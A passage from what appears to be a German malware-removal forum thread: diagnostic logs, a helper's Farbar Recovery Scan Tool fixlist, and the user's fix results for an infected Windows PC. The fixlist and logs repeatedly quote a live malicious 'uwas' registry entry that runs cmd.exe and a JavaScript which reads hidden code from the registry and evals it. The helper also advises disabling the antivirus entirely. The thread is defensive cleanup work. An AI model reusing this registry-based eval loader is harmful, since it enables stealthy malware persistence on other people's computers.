(Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: Die Anforderung wird nicht unterstützt. Error: (08/09/2017 06:40:23 PM) (Source: EventLog) (EventID: 6008) (User: ) Description: Das System wurde zuvor am 08.08.2017 um 23:15:03 unerwartet heruntergefahren. 
Error: (08/08/2017 11:15:06 PM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON) Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden. Error: (08/08/2017 11:15:06 PM) (Source: DCOM) (EventID: 10010) (User: SILENTDRAGON) Description: Der Server "{D7FD466D-F6CF-4C8E-86DD-12E9B0FDAE48}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden. CodeIntegrity: =================================== Date: 2017-07-28 18:15:03.249 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-07-28 18:15:02.562 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-07-05 21:28:31.069 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-05-20 13:12:31.840 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. 
Date: 2017-05-06 20:55:49.642 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-04-20 20:43:22.953 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-04-20 20:06:11.606 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-04-19 20:40:43.841 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. Date: 2017-04-19 20:18:44.959 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements. 
==================== Speicherinformationen =========================== Prozessor: Intel(R) Core(TM) i7-5820K CPU @ 3.30GHz Prozentuale Nutzung des RAM: 19% Installierter physikalischer RAM: 16279.21 MB Verfügbarer physikalischer RAM: 13118.89 MB Summe virtueller Speicher: 18711.21 MB Verfügbarer virtueller Speicher: 14960.39 MB ==================== Laufwerke ================================ Drive c: () (Fixed) (Total:237.69 GB) (Free:75.21 GB) NTFS Drive f: (Volume) (Fixed) (Total:3725.96 GB) (Free:3665.1 GB) NTFS Drive g: (Volume) (Fixed) (Total:3725.96 GB) (Free:2787.59 GB) NTFS ==================== MBR & Partitionstabelle ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: BE291492) Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=237.7 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=449 MB) - (Type=27) ======================================================== Disk: 1 (MBR Code: Windows 7 or 8) (Size: 7452 GB) (Disk ID: 00000000) Partition: GPT. ==================== Ende von Addition.txt ============================ |
09.08.2017, 22:07 | #29 |
/// Winkelfunktion /// TB-Süch-Tiger™ | UPC reports: viruses, worms are being sent via my IP FRST-Fix Please disable your virus scanner completely now to make sure the fix runs cleanly! Press the Windows key + R and type notepad into the Run window. Now copy the following text from the code box into the empty text document Code:
ATTFilter HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <==== ACHTUNG C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG C:\Program Files (x86)\IObit HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://search.avira.net/#web/result?source=art&q= FF Extension: (Avira Browser Safety) - C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com [2017-08-01] FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei] FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei] HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas: cmd.exe /c start "" "C:\Users\*****\AppData\Local\Wqy He\xfoqedfutx.hnen" "javascript:np5aj="n";j6Q0=new ActiveXObject("WScript.Shell");CJH0m="XMmT";Ku05Ci=j6Q0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");JQo0Sr="6SpeO0";eval(Ku05Ci);dYlGfd3="bB6tEkG";" <==== ACHTUNG Task: {057EAF51-6043-4A2C-8C62-FA5066DFA7DE} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG Task: {189B4981-5161-4573-95FB-914ABF5857A2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG Task: {2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG Task: {2C71CB98-75B2-4838-9B99-8BB2257CEC5B} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG Task: {41006DFD-D327-4048-9208-BB616205BF64} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG Task: {43681C05-5E15-43E2-93BB-8585D47F91E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG Task: {54193568-FA18-42AA-AA36-72AE0A69F1CE} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG Task: {749258DE-50AA-45E3-A106-4D57EA1939D4} - 
\Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG Task: {A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG Task: {DB66428E-B85F-4EDD-BC33-43CAA577BBCA} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG Task: {FDC309C3-7CAB-43AD-8822-78E3C63B88B4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG emptytemp:
Please save this as Fixlist.txt on your desktop (or in the directory where FRST is located).
__________________ Please always post log files in CODE tags |
10.08.2017, 17:13 | #30 |
| UPC reports: viruses, worms are being sent via my IP Hmm, the program was killed prematurely by Windows. I'll try again right away. Edit: Hmm, I can't turn off Windows Defender anymore since the latest update... interesting... maybe that's why the operation was aborted. Code:
ATTFilter Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-08-2017 durchgeführt von Martin333 (10-08-2017 17:45:04) Run:1 Gestartet von C:\Users\Martin ***\Desktop Geladene Profile: Martin *** (Verfügbare Profile: Martin**) Start-Modus: Normal ============================================== fixlist Inhalt: ***************** HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschr�nkung <==== ACHTUNG HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschr�nkung <==== ACHTUNG C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG C:\Program Files (x86)\IObit HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://search.avira.net/#web/result?source=art&q= FF Extension: (Avira Browser Safety) - C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com [2017-08-01] FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei] FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei] HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas: cmd.exe /c start "" "C:\Users\*****\AppData\Local\Wqy He\xfoqedfutx.hnen" "javascript:np5aj="n";j6Q0=new ActiveXObject("WScript.Shell");CJH0m="XMmT";Ku05Ci=j6Q0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");JQo0Sr="6SpeO0";eval(Ku05Ci);dYlGfd3="bB6tEkG";" <==== ACHTUNG Task: {057EAF51-6043-4A2C-8C62-FA5066DFA7DE} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG Task: {189B4981-5161-4573-95FB-914ABF5857A2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG Task: {2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG Task: {2C71CB98-75B2-4838-9B99-8BB2257CEC5B} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG Task: {41006DFD-D327-4048-9208-BB616205BF64} - 
\Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG Task: {43681C05-5E15-43E2-93BB-8585D47F91E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG Task: {54193568-FA18-42AA-AA36-72AE0A69F1CE} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG Task: {749258DE-50AA-45E3-A106-4D57EA1939D4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG Task: {A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG Task: {DB66428E-B85F-4EDD-BC33-43CAA577BBCA} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG Task: {FDC309C3-7CAB-43AD-8822-78E3C63B88B4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG emptytemp: ***************** HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => Schlüssel erfolgreich entfernt HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => Schlüssel erfolgreich entfernt "C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG" => nicht gefunden. C:\Program Files (x86)\IObit => erfolgreich verschoben HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com => nicht gefunden. HKLM\Software\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.0 => Schlüssel erfolgreich entfernt HKLM\Software\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.1 => Schlüssel erfolgreich entfernt RegLink Found. Source: "" => Target: "HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes" HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\ => Schlüssel erfolgreich entfernt HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas => Schlüssel nicht gefunden. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{057EAF51-6043-4A2C-8C62-FA5066DFA7DE} => Schlüssel konnte nicht entfernt werden. Zugriff verweigert.
Here is the rest of the log: Code:
ATTFilter Ergebnis der geplanten Datei-Verschiebungen (Start-Modus: Normal) (Datum&Uhrzeit: 10-08-2017 18:07:14)
Ergebnis der geplanten Schlüssel-Entfernung nach dem Neustart:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{057EAF51-6043-4A2C-8C62-FA5066DFA7DE} => Schlüssel erfolgreich entfernt
==== Ende vom Fixlog 18:07:14 ====
Code:
ATTFilter Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-08-2017
durchgeführt von Martin **** (10-08-2017 18:09:56) Run:2
Gestartet von C:\Users\Martin**\Desktop
Geladene Profile: Martin****(Verfügbare Profile: Martin 33)
Start-Modus: Normal
==============================================
fixlist Inhalt:
*****************
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <==== ACHTUNG
C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG
C:\Program Files (x86)\IObit
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://search.avira.net/#web/result?source=art&q=
FF Extension: (Avira Browser Safety) - C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com [2017-08-01]
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> G:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [Keine Datei]
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas: cmd.exe /c start "" "C:\Users\*****\AppData\Local\Wqy He\xfoqedfutx.hnen" "javascript:np5aj="n";j6Q0=new ActiveXObject("WScript.Shell");CJH0m="XMmT";Ku05Ci=j6Q0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");JQo0Sr="6SpeO0";eval(Ku05Ci);dYlGfd3="bB6tEkG";" <==== ACHTUNG
Task: {057EAF51-6043-4A2C-8C62-FA5066DFA7DE} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {189B4981-5161-4573-95FB-914ABF5857A2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {2C71CB98-75B2-4838-9B99-8BB2257CEC5B} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {41006DFD-D327-4048-9208-BB616205BF64} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {43681C05-5E15-43E2-93BB-8585D47F91E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
Task: {54193568-FA18-42AA-AA36-72AE0A69F1CE} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {749258DE-50AA-45E3-A106-4D57EA1939D4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {DB66428E-B85F-4EDD-BC33-43CAA577BBCA} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {FDC309C3-7CAB-43AD-8822-78E3C63B88B4} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
emptytemp:
*****************
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => Schlüssel konnte nicht entfernt werden, Schlüssel könnte geschützt sein
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => Schlüssel nicht gefunden.
"C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG" => nicht gefunden.
"C:\Program Files (x86)\IObit" => nicht gefunden.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt
C:\Users\***\AppData\Roaming\Mozilla\Firefox\Profiles\mYkrC8iv.default\Extensions\abs@avira.com => nicht gefunden.
HKLM\Software\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.0 => Schlüssel nicht gefunden.
HKLM\Software\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.1 => Schlüssel nicht gefunden.
RegLink Found. Source: "" => Target: "HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes"
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\ => Schlüssel erfolgreich entfernt
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas => Schlüssel nicht gefunden.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{057EAF51-6043-4A2C-8C62-FA5066DFA7DE} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{189B4981-5161-4573-95FB-914ABF5857A2} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{189B4981-5161-4573-95FB-914ABF5857A2} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2BFDCC5F-5F70-4BDA-8D57-85BB365542CA} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2C71CB98-75B2-4838-9B99-8BB2257CEC5B} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2C71CB98-75B2-4838-9B99-8BB2257CEC5B} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{41006DFD-D327-4048-9208-BB616205BF64} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{41006DFD-D327-4048-9208-BB616205BF64} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{43681C05-5E15-43E2-93BB-8585D47F91E4} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{43681C05-5E15-43E2-93BB-8585D47F91E4} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{54193568-FA18-42AA-AA36-72AE0A69F1CE} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{54193568-FA18-42AA-AA36-72AE0A69F1CE} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{749258DE-50AA-45E3-A106-4D57EA1939D4} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{749258DE-50AA-45E3-A106-4D57EA1939D4} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A6E3E460-B5D2-4349-BC82-DDCD409BC7D5} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{DB66428E-B85F-4EDD-BC33-43CAA577BBCA} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DB66428E-B85F-4EDD-BC33-43CAA577BBCA} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FDC309C3-7CAB-43AD-8822-78E3C63B88B4} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FDC309C3-7CAB-43AD-8822-78E3C63B88B4} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d => Schlüssel erfolgreich entfernt
=========== EmptyTemp: ==========
BITS transfer queue => 7888896 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 15107038 B
Java, Flash, Steam htmlcache => 682660468 B
Windows/system/drivers => 49826 B
Edge => 1498 B
Chrome => 26815042 B
Firefox => 4030740 B
Opera => 119808 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 0 B
NetworkService => 4440 B
Martin Walser => 33398127 B
RecycleBin => 11136170 B
EmptyTemp: => 745 MB temporäre Dateien entfernt.
================================
Ergebnis der geplanten Datei-Verschiebungen (Start-Modus: Normal) (Datum&Uhrzeit: 10-08-2017 18:11:25)
Ergebnis der geplanten Schlüssel-Entfernung nach dem Neustart:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => Schlüssel erfolgreich entfernt
==== Ende vom Fixlog 18:11:26 ====
Edited by Lost_Viking (10.08.2017 at 16:59) |